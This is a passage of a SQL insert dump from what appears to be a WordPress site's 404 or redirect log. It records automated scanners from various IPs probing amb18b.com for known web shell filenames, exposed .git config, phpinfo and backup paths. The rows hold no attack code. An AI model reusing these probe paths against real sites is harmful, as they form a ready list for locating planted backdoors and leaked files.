21:54:14'),(1990,'https://amb18b.com/wp-admin/asasx.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:16','2025-10-27 21:54:16'),(1991,'https://amb18b.com/wp-admin/classwithtostring.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:18','2025-10-27 21:54:18'),(1992,'https://amb18b.com/wp-admin/code.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:20','2025-10-27 21:54:20'),(1993,'https://amb18b.com/wp-admin/css/colors/blue/index.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:22','2025-10-27 21:54:22'),(1994,'https://amb18b.com/wp-admin/js/','13.89.129.89','Direct Access',1,'2025-10-27 21:54:29','2025-10-27 21:54:29'),(1995,'https://amb18b.com/wp-admin/js/widgets/','13.89.129.89','Direct Access',1,'2025-10-27 21:54:30','2025-10-27 21:54:30'),(1996,'https://amb18b.com/wp-admin/js/widgets/about.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:32','2025-10-27 21:54:32'),(1997,'https://amb18b.com/wp-admin/lock360.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:34','2025-10-27 21:54:34'),(1998,'https://amb18b.com/wp-admin/network/chosen.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:36','2025-10-27 21:54:36'),(1999,'https://amb18b.com/wp-admin/wp.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:38','2025-10-27 21:54:38'),(2000,'https://amb18b.com/wp-admin/wsa.php','13.89.129.89','Direct Access',1,'2025-10-27 21:54:40','2025-10-27 21:54:40'),(2001,'https://amb18b.com/wp-includes/ID3/','13.89.129.89','Direct Access',1,'2025-10-27 21:55:19','2025-10-27 21:55:19'),(2002,'https://amb18b.com/wp-includes/ID3/autoload_classmap.php','13.89.129.89','Direct Access',1,'2025-10-27 21:55:21','2025-10-27 21:55:21'),(2003,'https://amb18b.com/wp-includes/ID3/code.php','13.89.129.89','Direct Access',1,'2025-10-27 21:55:23','2025-10-27 21:55:23'),(2004,'https://amb18b.com/wp-includes/IXR/autoload_classmap.php','13.89.129.89','Direct Access',1,'2025-10-27 21:55:25','2025-10-27 21:55:25'),(2005,'https://amb18b.com/wp-includes/Text/index.php','13.89.129.89','Direct Access',1,'2025-10-27 21:55:27','2025-10-27 21:55:27'),(2006,'https://amb18b.com/wp-includes/blocks/comments/','13.89.129.89','Direct Access',1,'2025-10-27 21:55:29','2025-10-27 21:55:29'),(2007,'https://amb18b.com/wp-setup.php','13.89.129.89','Direct Access',1,'2025-10-27 21:55:31','2025-10-27 21:55:31'),(2008,'https://amb18b.com/wp.php','13.89.129.89','Direct Access',1,'2025-10-27 21:55:33','2025-10-27 21:55:33'),(2009,'https://amb18b.com/wsa.php','13.89.129.89','Direct Access',1,'2025-10-27 21:55:34','2025-10-27 21:55:34'),(2010,'https://amb18b.com/.git/config','139.59.72.212','Direct Access',1,'2025-10-28 00:51:38','2025-10-28 00:51:38'),(2011,'https://amb18b.com/.git/config','139.59.72.212','Direct Access',1,'2025-10-28 00:51:39','2025-10-28 00:51:39'),(2012,'https://amb18b.com/wordpress','20.22.194.228','Direct Access',1,'2025-10-28 01:22:20','2025-10-28 01:22:20'),(2013,'https://amb18b.com/wp','20.22.194.228','Direct Access',1,'2025-10-28 01:22:24','2025-10-28 01:22:24'),(2014,'https://amb18b.com/bc','20.22.194.228','Direct Access',1,'2025-10-28 01:22:26','2025-10-28 01:22:26'),(2015,'https://amb18b.com/bk','20.22.194.228','Direct Access',1,'2025-10-28 01:22:28','2025-10-28 01:22:28'),(2016,'https://amb18b.com/backup','20.22.194.228','Direct Access',1,'2025-10-28 01:22:29','2025-10-28 01:22:29'),(2017,'https://amb18b.com/old','20.22.194.228','Direct Access',1,'2025-10-28 01:22:31','2025-10-28 01:22:31'),(2018,'https://amb18b.com/new','20.22.194.228','Direct Access',1,'2025-10-28 01:22:32','2025-10-28 01:22:32'),(2019,'https://amb18b.com/main','20.22.194.228','Direct Access',1,'2025-10-28 01:22:34','2025-10-28 01:22:34'),(2020,'https://amb18b.com/%E0%B9%82%E0%B8%9B%E0%B8%A3%E0%B9%82%E0%B8%A1%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%99/','51.68.247.221','Direct Access',1,'2025-10-28 05:46:08','2025-10-28 05:46:08'),(2021,'https://amb18b.com/wordpress','20.22.194.228','Direct Access',1,'2025-10-28 07:40:55','2025-10-28 07:40:55'),(2022,'https://amb18b.com/wp','20.22.194.228','Direct Access',1,'2025-10-28 07:40:59','2025-10-28 07:40:59'),(2023,'https://amb18b.com/bc','20.22.194.228','Direct Access',1,'2025-10-28 07:41:00','2025-10-28 07:41:00'),(2024,'https://amb18b.com/bk','20.22.194.228','Direct Access',1,'2025-10-28 07:41:03','2025-10-28 07:41:03'),(2025,'https://amb18b.com/backup','20.22.194.228','Direct Access',1,'2025-10-28 07:41:04','2025-10-28 07:41:04'),(2026,'https://amb18b.com/old','20.22.194.228','Direct Access',1,'2025-10-28 07:41:06','2025-10-28 07:41:06'),(2027,'https://amb18b.com/new','20.22.194.228','Direct Access',1,'2025-10-28 07:41:07','2025-10-28 07:41:07'),(2028,'https://amb18b.com/main','20.22.194.228','Direct Access',1,'2025-10-28 07:41:09','2025-10-28 07:41:09'),(2029,'https://amb18b.com/ads.txt','35.212.193.178','Direct Access',1,'2025-10-28 08:47:11','2025-10-28 08:47:11'),(2030,'https://amb18b.com/chosen.php','85.172.100.155','Direct Access',1,'2025-10-28 09:07:19','2025-10-28 09:07:19'),(2031,'https://amb18b.com/goods.php','85.172.100.155','Direct Access',1,'2025-10-28 09:07:19','2025-10-28 09:07:19'),(2032,'https://amb18b.com/mah.php','85.172.100.155','Direct Access',1,'2025-10-28 09:07:19','2025-10-28 09:07:19'),(2033,'https://amb18b.com//wp-includes/ID3/license.txt','157.15.40.90','Direct Access',1,'2025-10-28 12:08:15','2025-10-28 12:08:15'),(2034,'https://amb18b.com/?author=2','157.15.40.90','Direct Access',1,'2025-10-28 12:08:17','2025-10-28 12:08:17'),(2035,'https://amb18b.com/phpinfo.php','185.218.108.60','Direct Access',1,'2025-10-28 13:15:08','2025-10-28 13:15:08'),(2036,'https://amb18b.com/p.php','185.218.108.60','Direct Access',1,'2025-10-28 13:15:08','2025-10-28 13:15:08'),(2037,'https://amb18b.com/info.php','185.218.108.60','Direct Access',1,'2025-10-28 13:15:09','2025-10-28 13:15:09'),(2038,'https://amb18b.com/i.php','185.218.108.60','Direct Access',1,'2025-10-28 13:15:09','2025-10-28 13:15:09'),(2039,'https://amb18b.com/test.php','185.218.108.60','Direct Access',1,'2025-10-28 13:15:09','2025-10-28 13:15:09'),(2040,'https://amb18b.com/htaccess.php','74.176.186.150','Direct Access',1,'2025-10-28 13:24:46','2025-10-28 13:24:46'),(2041,'https://amb18b.com/readme.php','74.176.186.150','Direct Access',1,'2025-10-28 13:24:47','2025-10-28 13:24:47'),(2042,'https://amb18b.com/as.php','74.176.186.150','Direct Access',1,'2025-10-28 13:24:48','2025-10-28 13:24:48'),(2043,'https://amb18b.com/403.php','74.176.186.150','Direct Access',2,'2025-10-28 13:26:04','2025-10-28 13:24:50'),(2044,'https://amb18b.com/max.php','74.176.186.150','Direct Access',1,'2025-10-28 13:24:51','2025-10-28 13:24:51'),(2045,'https://amb18b.com/m.php','74.176.186.150','Direct Access',1,'2025-10-28 13:24:53','2025-10-28 13:24:53'),(2046,'https://amb18b.com/post.php','74.176.186.150','Direct Access',1,'2025-10-28 13:24:55','2025-10-28 13:24:55'),(2047,'https://amb18b.com/themes.php','74.176.186.150','Direct Access',1,'2025-10-28 13:24:56','2025-10-28 13:24:56'),(2048,'https://amb18b.com/ALFA_DATA/index.php','74.176.186.150','Direct Access',1,'2025-10-28 13:24:58','2025-10-28 13:24:58'),(2049,'https://amb18b.com/wp-admin/maint/about.php','74.176.186.150','Direct Access',1,'2025-10-28 13:24:59','2025-10-28 13:24:59'),(2050,'https://amb18b.com/wp-admin/network/wp-conflg.php?p=','74.176.186.150','Direct Access',1,'2025-10-28 13:25:00','2025-10-28 13:25:00'),(2051,'https://amb18b.com/click.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:01','2025-10-28 13:25:01'),(2052,'https://amb18b.com/install.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:02','2025-10-28 13:25:02'),(2053,'https://amb18b.com/lv.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:03','2025-10-28 13:25:03'),(2054,'https://amb18b.com/simple.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:04','2025-10-28 13:25:04'),(2055,'https://amb18b.com/13k.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:06','2025-10-28 13:25:06'),(2056,'https://amb18b.com/css.php','74.176.186.150','Direct Access',2,'2025-10-28 13:25:26','2025-10-28 13:25:07'),(2057,'https://amb18b.com/up.php?x=','74.176.186.150','Direct Access',1,'2025-10-28 13:25:08','2025-10-28 13:25:08'),(2058,'https://amb18b.com/0x1949.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:09','2025-10-28 13:25:09'),(2059,'https://amb18b.com/cong.php','74.176.186.150','Direct Access',2,'2025-10-28 13:25:16','2025-10-28 13:25:10'),(2060,'https://amb18b.com/fw.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:11','2025-10-28 13:25:11'),(2061,'https://amb18b.com/bs1.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:12','2025-10-28 13:25:12'),(2062,'https://amb18b.com/wp-includes/images/wp-login.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:13','2025-10-28 13:25:13'),(2063,'https://amb18b.com/termps.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:14','2025-10-28 13:25:14'),(2064,'https://amb18b.com/brand.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:15','2025-10-28 13:25:15'),(2065,'https://amb18b.com/atomlib.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:17','2025-10-28 13:25:17'),(2066,'https://amb18b.com/w.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:18','2025-10-28 13:25:18'),(2067,'https://amb18b.com/404.php','74.176.186.150','Direct Access',2,'2025-10-28 13:25:57','2025-10-28 13:25:20'),(2068,'https://amb18b.com/article.php','74.176.186.150','Direct Access',2,'2025-10-28 13:26:01','2025-10-28 13:25:21'),(2069,'https://amb18b.com/0x.php','74.176.186.150','Direct Access',2,'2025-10-28 13:25:35','2025-10-28 13:25:25'),(2070,'https://amb18b.com/222.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:27','2025-10-28 13:25:27'),(2071,'https://amb18b.com/1.php','74.176.186.150','Direct Access',2,'2025-10-28 13:26:03','2025-10-28 13:25:28'),(2072,'https://amb18b.com/admin.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:29','2025-10-28 13:25:29'),(2073,'https://amb18b.com/wp-admin/maint/maint.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:30','2025-10-28 13:25:30'),(2074,'https://amb18b.com/classwithtostring.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:31','2025-10-28 13:25:31'),(2075,'https://amb18b.com/dropdown.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:33','2025-10-28 13:25:33'),(2076,'https://amb18b.com/moon.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:34','2025-10-28 13:25:34'),(2077,'https://amb18b.com/moon.php?p=','74.176.186.150','Direct Access',1,'2025-10-28 13:25:36','2025-10-28 13:25:36'),(2078,'https://amb18b.com/autoload_classmap.php?p=','74.176.186.150','Direct Access',1,'2025-10-28 13:25:37','2025-10-28 13:25:37'),(2079,'https://amb18b.com/inputs.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:38','2025-10-28 13:25:38'),(2080,'https://amb18b.com/default.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:39','2025-10-28 13:25:39'),(2081,'https://amb18b.com/fm.php?p=','74.176.186.150','Direct Access',1,'2025-10-28 13:25:40','2025-10-28 13:25:40'),(2082,'https://amb18b.com/fm.php?fm=true','74.176.186.150','Direct Access',1,'2025-10-28 13:25:41','2025-10-28 13:25:41'),(2083,'https://amb18b.com/about.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:43','2025-10-28 13:25:43'),(2084,'https://amb18b.com/file.php?','74.176.186.150','Direct Access',1,'2025-10-28 13:25:44','2025-10-28 13:25:44'),(2085,'https://amb18b.com/alfa.php','74.176.186.150','Direct Access',2,'2025-10-28 13:26:02','2025-10-28 13:25:45'),(2086,'https://amb18b.com/buy.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:46','2025-10-28 13:25:46'),(2087,'https://amb18b.com/themes/twentytwentytwo/index.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:47','2025-10-28 13:25:47'),(2088,'https://amb18b.com/wp-admin/js/wp-conflg.php?p=','74.176.186.150','Direct Access',1,'2025-10-28 13:25:49','2025-10-28 13:25:49'),(2089,'https://amb18b.com/wp-admin/wp-conflg.php?p=','74.176.186.150','Direct Access',1,'2025-10-28 13:25:50','2025-10-28 13:25:50'),(2090,'https://amb18b.com/wp-admin/css/wp-conflg.php?p=','74.176.186.150','Direct Access',1,'2025-10-28 13:25:51','2025-10-28 13:25:51'),(2091,'https://amb18b.com/manager.php?p=','74.176.186.150','Direct Access',1,'2025-10-28 13:25:52','2025-10-28 13:25:52'),(2092,'https://amb18b.com/js/fm.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:53','2025-10-28 13:25:53'),(2093,'https://amb18b.com/item.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:55','2025-10-28 13:25:55'),(2094,'https://amb18b.com/plugins/Cache/footer.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:56','2025-10-28 13:25:56'),(2095,'https://amb18b.com/mail.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:58','2025-10-28 13:25:58'),(2096,'https://amb18b.com/sx.php','74.176.186.150','Direct Access',1,'2025-10-28 13:25:59','2025-10-28 13:25:59'),(2097,'https://amb18b.com/wp-admin/maint/admin.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:00','2025-10-28 13:26:00'),(2098,'https://amb18b.com/link.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:05','2025-10-28 13:26:05'),(2099,'https://amb18b.com/byp.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:06','2025-10-28 13:26:06'),(2100,'https://amb18b.com/bak.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:07','2025-10-28 13:26:07'),(2101,'https://amb18b.com/ini.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:08','2025-10-28 13:26:08'),(2102,'https://amb18b.com/ws.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:09','2025-10-28 13:26:09'),(2103,'https://amb18b.com/wp-trackback.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:10','2025-10-28 13:26:10'),(2104,'https://amb18b.com/.well-known/index.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:11','2025-10-28 13:26:11'),(2105,'https://amb18b.com/wp-includes/certificates/plugins.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:12','2025-10-28 13:26:12'),(2106,'https://amb18b.com/gmo.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:19','2025-10-28 13:26:19'),(2107,'https://amb18b.com/wp-includes/ID3/about.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:20','2025-10-28 13:26:20'),(2108,'https://amb18b.com/css/index.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:21','2025-10-28 13:26:21'),(2109,'https://amb18b.com/wp-admin/includes/xmrlpc.php?p=','74.176.186.150','Direct Access',1,'2025-10-28 13:26:22','2025-10-28 13:26:22'),(2110,'https://amb18b.com/wp-includes/SimplePie/wp-login.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:23','2025-10-28 13:26:23'),(2111,'https://amb18b.com/filemanager/dialog.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:26','2025-10-28 13:26:26'),(2112,'https://amb18b.com/wp-admin/maint/index.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:27','2025-10-28 13:26:27'),(2113,'https://amb18b.com/wp-includes/Requests/Text/admin.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:28','2025-10-28 13:26:28'),(2114,'https://amb18b.com/wp-includes/customize/about.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:29','2025-10-28 13:26:29'),(2115,'https://amb18b.com/index/function.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:30','2025-10-28 13:26:30'),(2116,'https://amb18b.com/uploads/autoload_classmap.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:31','2025-10-28 13:26:31'),(2117,'https://amb18b.com/wp-includes/css/dist/preferences/wp-login.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:32','2025-10-28 13:26:32'),(2118,'https://amb18b.com/wp-includes/style-engine/about.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:33','2025-10-28 13:26:33'),(2119,'https://amb18b.com/.well-known/acme-challenge/mariju.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:34','2025-10-28 13:26:34'),(2120,'https://amb18b.com/about/function.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:35','2025-10-28 13:26:35'),(2121,'https://amb18b.com/wp-includes/theme-compat/chosen.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:36','2025-10-28 13:26:36'),(2122,'https://amb18b.com/admin/function.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:37','2025-10-28 13:26:37'),(2123,'https://amb18b.com/.well-known/acme-challenge/index.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:38','2025-10-28 13:26:38'),(2124,'https://amb18b.com/css/colors/blue/index.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:40','2025-10-28 13:26:40'),(2125,'https://amb18b.com/wp-admin/setup-config.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:41','2025-10-28 13:26:41'),(2126,'https://amb18b.com/wp-admin/js/index.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:44','2025-10-28 13:26:44'),(2127,'https://amb18b.com/wp-includes/assets/index.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:46','2025-10-28 13:26:46'),(2128,'https://amb18b.com/wp-includes/fonts/index.php?p=','74.176.186.150','Direct Access',1,'2025-10-28 13:26:48','2025-10-28 13:26:48'),(2129,'https://amb18b.com/.well-known/gecko-litespeed.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:49','2025-10-28 13:26:49'),(2130,'https://amb18b.com/.well-known/admin.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:50','2025-10-28 13:26:50'),(2131,'https://amb18b.com/.well-known/log.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:54','2025-10-28 13:26:54'),(2132,'https://amb18b.com/class.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:55','2025-10-28 13:26:55'),(2133,'https://amb18b.com/bless.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:56','2025-10-28 13:26:56'),(2134,'https://amb18b.com/wp-includes/js/codemirror/index.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:57','2025-10-28 13:26:57'),(2135,'https://amb18b.com/wp-includes/block-patterns/index.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:58','2025-10-28 13:26:58'),(2136,'https://amb18b.com/lock360.php','74.176.186.150','Direct Access',1,'2025-10-28 13:26:59','2025-10-28 13:26:59'),(2137,'https://amb18b.com/bge.php','74.176.186.150','Direct Access',1,'2025-10-28 13:27:00','2025-10-28 13:27:00'),(2138,'https://amb18b.com/ifm.php','74.176.186.150','Direct Access',1,'2025-10-28 13:27:01','2025-10-28 13:27:01'),(2139,'https://amb18b.com/thxt.php','74.176.186.150','Direct Access',1,'2025-10-28 13:27:02','2025-10-28 13:27:02'),(2140,'https://amb18b.com/kairolin.php','74.176.186.150','Direct Access',1,'2025-10-28 13:27:03','2025-10-28 13:27:03'),(2141,'https://amb18b.com/siln.php','74.176.186.150','Direct Access',1,'2025-10-28 13:27:05','2025-10-28 13:27:05'),(2142,'https://amb18b.com/wordpress','20.22.194.228','Direct Access',1,'2025-10-28 13:50:29','2025-10-28 13:50:29'),(2143,'https://amb18b.com/wp','20.22.194.228','Direct Access',1,'2025-10-28 13:50:34','2025-10-28 13:50:34'),(2144,'https://amb18b.com/bc','20.22.194.228','Direct Access',1,'2025-10-28 13:50:36','2025-10-28 13:50:36'),(2145,'https://amb18b.com/bk','20.22.194.228','Direct Access',1,'2025-10-28 13:50:37','2025-10-28 13:50:37'),(2146,'https://amb18b.com/backup','20.22.194.228','Direct Access',1,'2025-10-28 13:50:40','2025-10-28 13:50:40'),(2147,'https://amb18b.com/old','20.22.194.228','Direct Access',1,'2025-10-28 13:50:42','2025-10-28 13:50:42'),(2148,'https://amb18b.com/new','20.22.194.228','Direct Access',1,'2025-10-28 13:50:44','2025-10-28 13:50:44'),(2149,'https://amb18b.com/main','20.22.194.228','Direct Access',1,'2025-10-28 13:50:46','2025-10-28 13:50:46'),(2150,'https://amb18b.com/administrator/components/com_facileforms/libraries/jquery/tooltip.js','196.251.86.13','Direct Access',1,'2025-10-28 17:10:12','2025-10-28 17:10:12'),(2151,'https://amb18b.com/htaccess.php','40.69.66.178','Direct Access',1,'2025-10-28 17:14:32','2025-10-28 17:14:32'),(2152,'https://amb18b.com/readme.php','40.69.66.178','Direct Access',1,'2025-10-28 17:14:34','2025-10-28 17:14:34'),(2153,'https://amb18b.com/as.php','40.69.66.178','Direct Access',1,'2025-10-28 17:14:36','2025-10-28 17:14:36'),(2154,'https://amb18b.com/rh.php','40.69.66.178','Direct Access',1,'2025-10-28 17:14:38','2025-10-28 17:14:38'),(2155,'https://amb18b.com/css.php','40.69.66.178','Direct Access',3,'2025-10-28 17:15:59','2025-10-28 17:14:40'),(2156,'https://amb18b.com/gfile.php','40.69.66.178','Direct Access',1,'2025-10-28 17:14:41','2025-10-28 17:14:41'),(2157,'https://amb18b.com/cfile.php','40.69.66.178','Direct Access',1,'2025-10-28 17:14:43','2025-10-28 17:14:43'),(2158,'https://amb18b.com/wefile.php','40.69.66.178','Direct Access',1,'2025-10-28 17:14:46','2025-10-28 17:14:46'),(2159,'https://amb18b.com/403.php','40.69.66.178','Direct Access',2,'2025-10-28 17:17:05','2025-10-28 17:14:48'),(2160,'https://amb18b.com/max.php','40.69.66.178','Direct Access',1,'2025-10-28 17:14:51','2025-10-28 17:14:51'),(2161,'https://amb18b.com/m.php','40.69.66.178','Direct Access',1,'2025-10-28 17:14:54','2025-10-28 17:14:54'),(2162,'https://amb18b.com/post.php','40.69.66.178','Direct Access',1,'2025-10-28 17:14:56','2025-10-28 17:14:56'),(2163,'https://amb18b.com/themes.php','40.69.66.178','Direct Access',1,'2025-10-28 17:14:59','2025-10-28 17:14:59'),(2164,'https://amb18b.com/ALFA_DATA/index.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:03','2025-10-28 17:15:03'),(2165,'https://amb18b.com/wp-admin/maint/about.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:05','2025-10-28 17:15:05'),(2166,'https://amb18b.com/wp-admin/network/wp-conflg.php?p=','40.69.66.178','Direct Access',1,'2025-10-28 17:15:07','2025-10-28 17:15:07'),(2167,'https://amb18b.com/click.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:09','2025-10-28 17:15:09'),(2168,'https://amb18b.com/install.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:11','2025-10-28 17:15:11'),(2169,'https://amb18b.com/lv.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:13','2025-10-28 17:15:13'),(2170,'https://amb18b.com/simple.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:16','2025-10-28 17:15:16'),(2171,'https://amb18b.com/13k.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:17','2025-10-28 17:15:17'),(2172,'https://amb18b.com/up.php?x=','40.69.66.178','Direct Access',1,'2025-10-28 17:15:22','2025-10-28 17:15:22'),(2173,'https://amb18b.com/0x1949.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:24','2025-10-28 17:15:24'),(2174,'https://amb18b.com/cong.php','40.69.66.178','Direct Access',2,'2025-10-28 17:15:40','2025-10-28 17:15:26'),(2175,'https://amb18b.com/fw.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:28','2025-10-28 17:15:28'),(2176,'https://amb18b.com/bs1.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:30','2025-10-28 17:15:30'),(2177,'https://amb18b.com/wp-includes/images/wp-login.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:32','2025-10-28 17:15:32'),(2178,'https://amb18b.com/termps.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:34','2025-10-28 17:15:34'),(2179,'https://amb18b.com/brand.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:36','2025-10-28 17:15:36'),(2180,'https://amb18b.com/goods.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:38','2025-10-28 17:15:38'),(2181,'https://amb18b.com/atomlib.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:42','2025-10-28 17:15:42'),(2182,'https://amb18b.com/w.php','40.69.66.178','Direct Access',1,'2025-10-28 17:15:44','2025-10-28 17:15:44'),(2183,'https://amb18b.com/404.php?fm=true','40.69.66.178','Direct Access',1,'2025-10-28 17:15:47','2025-10-28 17:15:47'),(2184,'https://amb18b.com/404.php','40.69.66.178','Direct Access',2,'2025-10-28 17:16:51','2025-10-28 17:15:49'),(2185,'https://amb18b.com/article.php','40.69.66.178','Direct Access',2,'2025-10-28 17:16:58','2025-10-28 17:15:51'),(2186,'https://amb18b.com/0x.php','40.69.66.178','Direct Access',2,'2025-10-28 17:16:15','2025-10-28 17:15:57'),(2187,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/filemanager.php?p=','40.69.66.178','Direct Access',1,'2025-10-28 17:16:01','2025-10-28 17:16:01'),(2188,'https://amb18b.com/1.php','40.69.66.178','Direct Access',2,'2025-10-28 17:17:03','2025-10-28 17:16:03'),(2189,'https://amb18b.com/admin.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:05','2025-10-28 17:16:05'),(2190,'https://amb18b.com/wp-admin/maint/maint.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:07','2025-10-28 17:16:07'),(2191,'https://amb18b.com/classwithtostring.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:09','2025-10-28 17:16:09'),(2192,'https://amb18b.com/dropdown.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:10','2025-10-28 17:16:10'),(2193,'https://amb18b.com/moon.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:13','2025-10-28 17:16:13'),(2194,'https://amb18b.com/moon.php?p=','40.69.66.178','Direct Access',1,'2025-10-28 17:16:17','2025-10-28 17:16:17'),(2195,'https://amb18b.com/autoload_classmap.php?p=','40.69.66.178','Direct Access',1,'2025-10-28 17:16:19','2025-10-28 17:16:19'),(2196,'https://amb18b.com/inputs.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:21','2025-10-28 17:16:21'),(2197,'https://amb18b.com/default.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:23','2025-10-28 17:16:23'),(2198,'https://amb18b.com/fm.php?p=','40.69.66.178','Direct Access',1,'2025-10-28 17:16:25','2025-10-28 17:16:25'),(2199,'https://amb18b.com/fm.php?fm=true','40.69.66.178','Direct Access',1,'2025-10-28 17:16:27','2025-10-28 17:16:27'),(2200,'https://amb18b.com/about.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:29','2025-10-28 17:16:29'),(2201,'https://amb18b.com/file.php?','40.69.66.178','Direct Access',1,'2025-10-28 17:16:31','2025-10-28 17:16:31'),(2202,'https://amb18b.com/alfa.php','40.69.66.178','Direct Access',2,'2025-10-28 17:17:00','2025-10-28 17:16:32'),(2203,'https://amb18b.com/buy.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:34','2025-10-28 17:16:34'),(2204,'https://amb18b.com/themes/twentytwentytwo/index.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:36','2025-10-28 17:16:36'),(2205,'https://amb18b.com/wp-admin/js/wp-conflg.php?p=','40.69.66.178','Direct Access',1,'2025-10-28 17:16:38','2025-10-28 17:16:38'),(2206,'https://amb18b.com/wp-admin/wp-conflg.php?p=','40.69.66.178','Direct Access',1,'2025-10-28 17:16:39','2025-10-28 17:16:39'),(2207,'https://amb18b.com/wp-admin/css/wp-conflg.php?p=','40.69.66.178','Direct Access',1,'2025-10-28 17:16:41','2025-10-28 17:16:41'),(2208,'https://amb18b.com/manager.php?p=','40.69.66.178','Direct Access',1,'2025-10-28 17:16:43','2025-10-28 17:16:43'),(2209,'https://amb18b.com/js/fm.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:45','2025-10-28 17:16:45'),(2210,'https://amb18b.com/item.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:47','2025-10-28 17:16:47'),(2211,'https://amb18b.com/plugins/Cache/footer.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:49','2025-10-28 17:16:49'),(2212,'https://amb18b.com/mail.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:53','2025-10-28 17:16:53'),(2213,'https://amb18b.com/sx.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:55','2025-10-28 17:16:55'),(2214,'https://amb18b.com/wp-admin/maint/admin.php','40.69.66.178','Direct Access',1,'2025-10-28 17:16:57','2025-10-28 